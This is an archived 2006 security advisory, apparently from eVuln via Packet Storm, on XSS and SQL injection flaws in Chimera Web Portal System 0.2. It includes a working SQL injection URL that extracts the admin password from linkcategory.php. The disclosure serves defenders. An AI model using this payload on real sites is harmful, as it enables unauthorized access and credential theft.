EV0007.txt

2006-01-04T00:00:00
ID PACKETSTORM:42769
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-04T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
Chimera Web Portal System Multiple Vulnerabilities  
  
--------------------Summary----------------  
Vendor: Phanatic Softwares (http://www.psoftwares.f2s.com/)  
Software: Chimera Web Portal System (http://sourceforge.net/projects/chimera/)  
Versions: 0.2  
Critical Level: Moderate  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
Published: 2006.01.01  
eVuln ID: EV0007  
  
-----------------Description--------------  
XSS  
Vulnerable script:  
modules.php  
  
Variables comment_poster comment_poster_email comment_poster_homepage comment_text isn't sanitized. Users can post messages with any script code.  
  
  
SQL Injection  
Vulnerable script:  
linkcategory.php  
  
Variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
  
Condition: gpc_magic_quotes = off  
  
  
--------------Exploit---------------------  
XSS  
guestbook:  
http://host/chimera/modules.php?name=guestbook&file=index  
comment_poster=XSS  
comment_poster_email=XSS  
comment_poster_homepage=XSS  
comment_text=XSS  
  
SQL Injection  
admin password:  
http://host/chimera/linkcategory.php?id=9999'%20union%20select%20admin_password%20from%20admin/*  
  
  
--------------Solution---------------------  
No Patch available.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/7/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)  
`